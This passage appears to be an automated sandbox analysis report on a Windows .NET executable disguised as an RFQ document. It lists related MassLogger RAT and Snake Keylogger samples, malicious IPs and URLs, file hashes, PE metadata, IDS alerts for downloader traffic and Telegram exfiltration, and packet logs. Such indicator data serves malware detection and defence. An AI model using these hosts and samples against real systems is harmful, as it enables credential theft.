                                                                                                                                                                                              http://www.singhs.lvGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                              • 104.18.11.207
                                                                                                                                                                                              http://18ofcontents.shopGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.96.1
                                                                                                                                                                                              https://www.dcamarketintelligence.com/tdtGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.26.15.92
                                                                                                                                                                                              1162-201.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • 104.21.64.1
                                                                                                                                                                                              https://cdn.btmessage.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 172.67.74.232
                                                                                                                                                                                              http://www.austrata.net.auGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 1.1.1.1
                                                                                                                                                                                              https://www.cineuserdad.ecGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              https://form.fillout.com/t/emEtLm993dusGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.26.1.150
                                                                                                                                                                                              https://form.fillout.com/t/emEtLm993dusGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.17.25.14
                                                                                                                                                                                              ORACLE-BMC-31898USTepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 193.122.130.0
                                                                                                                                                                                              PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                              • 158.101.44.242
                                                                                                                                                                                              SOA NOV. Gateway Freight_MEDWA0577842.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 193.122.130.0
                                                                                                                                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 193.122.130.0
                                                                                                                                                                                              Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 193.122.130.0
                                                                                                                                                                                              Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 193.122.130.0
                                                                                                                                                                                              Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                              • 193.122.6.168
                                                                                                                                                                                              December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 193.122.6.168
                                                                                                                                                                                              PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 193.122.6.168
                                                                                                                                                                                              BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 158.101.44.242

                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              54328bd36c14bd82ddaa0c04b25ed9adTepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 104.21.48.1
                                                                                                                                                                                              PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                              • 104.21.48.1
                                                                                                                                                                                              SOA NOV. Gateway Freight_MEDWA0577842.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 104.21.48.1
                                                                                                                                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 104.21.48.1
                                                                                                                                                                                              #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 104.21.48.1
                                                                                                                                                                                              fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 104.21.48.1
                                                                                                                                                                                              fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 104.21.48.1
                                                                                                                                                                                              1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 104.21.48.1
                                                                                                                                                                                              jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 104.21.48.1
                                                                                                                                                                                              Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                              • 104.21.48.1
                                                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0e1736491685cd440ba02224486139c45779065ac91a3edb422c48d3d3c6920c4d30fc9d2bfc582.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              https://aqctslc.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              https://sacredartscommunications.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              http://stonecoldstalley.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              RFQ-12202430_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              PaymentAdvice.htmlGet hashmaliciousKnowBe4Browse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              PO-12202432_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                              fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 149.154.167.220

                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                              No context

                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.log

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1216
                                                                                                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
                                                                                                                                                                                              MD5:E193AFF55D4BDD9951CB4287A7D79653
                                                                                                                                                                                              SHA1:F94AD920B9E0EB43B5005D74552AB84EAA38E985
                                                                                                                                                                                              SHA-256:08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
                                                                                                                                                                                              SHA-512:86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                                                                                                                              Static File Info

                                                                                                                                                                                              General

                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                              Entropy (8bit):6.976825506593515
                                                                                                                                                                                              TrID:
                                                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                                                                                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                              File name:RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
                                                                                                                                                                                              File size:842'624 bytes
                                                                                                                                                                                              MD5:02bc82a10c674c5c8f60d293e22a544e
                                                                                                                                                                                              SHA1:7b6aecdc2468eb633ddec37397e55fc778c824c2
                                                                                                                                                                                              SHA256:8b672671606f402445e1d10caf2f59a41e36ae4201d189ac202f5c7c0c66f3a4
                                                                                                                                                                                              SHA512:db3d9771b2dff93f1117e5702be38808132519b656b87ae7fc99582882501911e2e8ff4ad23a70a63d7bfa7c55f3811d80eed42a835fa678b8e09f8e153a7d10
                                                                                                                                                                                              SSDEEP:12288:QcGLc0gGcbsnxBGh6j0pSApXUFwK0g5MCao3AiqLwgDd7P//RIFLIs7Q:/iNgQ7YpdXgXgo3A9LZ7P/JIFLIs7Q
                                                                                                                                                                                              TLSH:3505F1003705EC75FCB9043287B4C3FB42BCED1289A7959F19AE7957ACBD31A3AA1095
                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...DZ.a.................@...>......^_... ........@.. ....................................`................................

                                                                                                                                                                                              File Icon

                                                                                                                                                                                              Icon Hash:74f0d4d4d4d4d4cc

                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                              General

                                                                                                                                                                                              Entrypoint:0x4b5f5e
                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                              Time Stamp:0x61DB5A44 [Sun Jan 9 21:57:24 2022 UTC]
                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                              File Version Major:4
                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                              Authenticode Signature

                                                                                                                                                                                              Signature Valid:false
                                                                                                                                                                                              Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                              Error Number:-2146869232
                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                              • 10/01/2022 00:00:00 09/01/2025 23:59:59
                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                              • CN=DOS SANTOS DA SILVA ALFREDO, O=DOS SANTOS DA SILVA ALFREDO, S=Occitanie, C=FR, OID.2.5.4.15=Business Entity, OID.1.3.6.1.4.1.311.60.2.1.3=FR, SERIALNUMBER=789 849 163 00025
                                                                                                                                                                                              Version:3
                                                                                                                                                                                              Thumbprint MD5:969883F5E1C9A0AFDC8ECA5778CD455E
                                                                                                                                                                                              Thumbprint SHA-1:0FFC830BD50362A6993425B973EFEA97BC8AEB0E
                                                                                                                                                                                              Thumbprint SHA-256:BB48064FA3A2272DD3B18C9D330293C867964D2880520CFA45ABEA00BE80BB9F
                                                                                                                                                                                              Serial:009EB86320BC00ABF185BBDE0332C26F58

                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                              Instruction
                                                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add al, 00h
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add eax, dword ptr [eax]
                                                                                                                                                                                              add eax, dword ptr [eax]
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              sub byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax+0000000Eh], al
                                                                                                                                                                                              pop eax
                                                                                                                                                                                              add eax, dword ptr [eax]
                                                                                                                                                                                              adc byte ptr [eax], 00000000h
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              sub byte ptr [eax+eax], al

                                                                                                                                                                                              Data Directories

                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb5f0c0x4f.text
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb60000x13ac8.rsrc
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xc80000x5b80
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xca0000xc.reloc
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                              Sections

                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                              .text0x20000xb3f640xb400060bf729befb0af3bd969a1d891d20857False0.6221110026041666data6.98396364188515IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                              .rsrc0xb60000x13ac80x13c003b35da8abd436ffa84ad1a516fa28b1bFalse0.42601611946202533data6.0105573277605675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                              .reloc0xca0000xc0x2009432aec11d32a7d72ee515f59585668cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                              Resources

                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                              RT_ICON0xb66580x42b0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9922680412371134
                                                                                                                                                                                              RT_ICON0xba9080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.4594882729211087
                                                                                                                                                                                              RT_ICON0xbb7b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.48826714801444043
                                                                                                                                                                                              RT_ICON0xbc0580x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.478110599078341
                                                                                                                                                                                              RT_ICON0xbc7200x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.37210982658959535
                                                                                                                                                                                              RT_ICON0xbcc880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.24201244813278008
                                                                                                                                                                                              RT_ICON0xbf2300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.2924484052532833
                                                                                                                                                                                              RT_ICON0xc02d80x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.3942622950819672
                                                                                                                                                                                              RT_ICON0xc0c600x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.49379432624113473
                                                                                                                                                                                              RT_ICON0xc10c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.33198924731182794
                                                                                                                                                                                              RT_ICON0xc13b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.41216216216216217
                                                                                                                                                                                              RT_ICON0xc14d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.42905405405405406
                                                                                                                                                                                              RT_ICON0xc16000x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.2661290322580645
                                                                                                                                                                                              RT_ICON0xc18e80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 5120.18010752688172044
                                                                                                                                                                                              RT_ICON0xc1bd00x128Device independent bitmap graphic, 16 x 32 x 4, image size 1280.35135135135135137
                                                                                                                                                                                              RT_ICON0xc1cf80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.06092057761732852
                                                                                                                                                                                              RT_ICON0xc25a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.07658959537572255
                                                                                                                                                                                              RT_ICON0xc2b080xca8Device independent bitmap graphic, 32 x 64 x 24, image size 30720.042901234567901236
                                                                                                                                                                                              RT_ICON0xc37b00x368Device independent bitmap graphic, 16 x 32 x 24, image size 7680.10550458715596331
                                                                                                                                                                                              RT_ICON0xc3b180x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.6400709219858156
                                                                                                                                                                                              RT_ICON0xc3f800x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.5
                                                                                                                                                                                              RT_ICON0xc40a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.19060283687943264
                                                                                                                                                                                              RT_ICON0xc45100x1128Device independent bitmap graphic, 32 x 64 x 32, image size 43520.11429872495446267
                                                                                                                                                                                              RT_ICON0xc56380x2668Device independent bitmap graphic, 48 x 96 x 32, image size 97920.07211147274206672
                                                                                                                                                                                              RT_ICON0xc7ca00x1952PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.7099660598580685
                                                                                                                                                                                              RT_GROUP_ICON0xc95f40x3edata0.8709677419354839
                                                                                                                                                                                              RT_GROUP_ICON0xc96340x84data0.6893939393939394
                                                                                                                                                                                              RT_GROUP_ICON0xc96b80x22data1.0588235294117647
                                                                                                                                                                                              RT_GROUP_ICON0xc96dc0x22data1.0588235294117647
                                                                                                                                                                                              RT_GROUP_ICON0xc97000x5adata0.7666666666666667
                                                                                                                                                                                              RT_GROUP_ICON0xc975c0x22data1.1176470588235294
                                                                                                                                                                                              RT_VERSION0xc97800x348dataEnglishUnited States0.4154761904761905

                                                                                                                                                                                              Imports

                                                                                                                                                                                              DLLImport
                                                                                                                                                                                              mscoree.dll_CorExeMain

                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                              2025-01-10T09:29:19.770796+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449871193.122.130.080TCP
                                                                                                                                                                                              2025-01-10T09:29:20.598929+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449871193.122.130.080TCP
                                                                                                                                                                                              2025-01-10T09:29:21.137570+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449882104.21.48.1443TCP
                                                                                                                                                                                              2025-01-10T09:29:21.661416+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449885193.122.130.080TCP
                                                                                                                                                                                              2025-01-10T09:29:24.456913+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449906104.21.48.1443TCP
                                                                                                                                                                                              2025-01-10T09:29:25.579354+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449915104.21.80.1443TCP
                                                                                                                                                                                              2025-01-10T09:29:26.637643+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449923104.21.80.1443TCP
                                                                                                                                                                                              2025-01-10T09:29:29.795113+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449946149.154.167.220443TCP

                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Jan 10, 2025 09:29:19.143357992 CET4987180192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:19.148320913 CET8049871193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:19.148405075 CET4987180192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:19.148757935 CET4987180192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:19.153681993 CET8049871193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:19.612875938 CET8049871193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:19.617446899 CET4987180192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:19.622454882 CET8049871193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:19.720211983 CET8049871193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:19.770796061 CET4987180192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:19.772367954 CET49877443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:19.772406101 CET44349877104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:19.772505045 CET49877443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:19.784185886 CET49877443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:19.784216881 CET44349877104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:20.262109995 CET44349877104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:20.262195110 CET49877443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:20.266227961 CET49877443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:20.266237020 CET44349877104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:20.266520023 CET44349877104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:20.317662954 CET49877443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:20.322990894 CET49877443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:20.363331079 CET44349877104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:20.435488939 CET44349877104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:20.435545921 CET44349877104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:20.435743093 CET49877443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:20.442261934 CET49877443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:20.445688009 CET4987180192.168.2.4193.122.130.0
                                                                                                                                                                                              Jan 10, 2025 09:29:20.450484037 CET8049871193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:20.550591946 CET8049871193.122.130.0192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:20.553495884 CET49882443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:20.553550005 CET44349882104.21.48.1192.168.2.4
                                                                                                                                                                                              Jan 10, 2025 09:29:20.553879976 CET49882443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:20.554191113 CET49882443192.168.2.4104.21.48.1
                                                                                                                                                                                              Jan 10, 2025 09:29:20.554209948 CET44349882104.21.48.1192.168.2.4
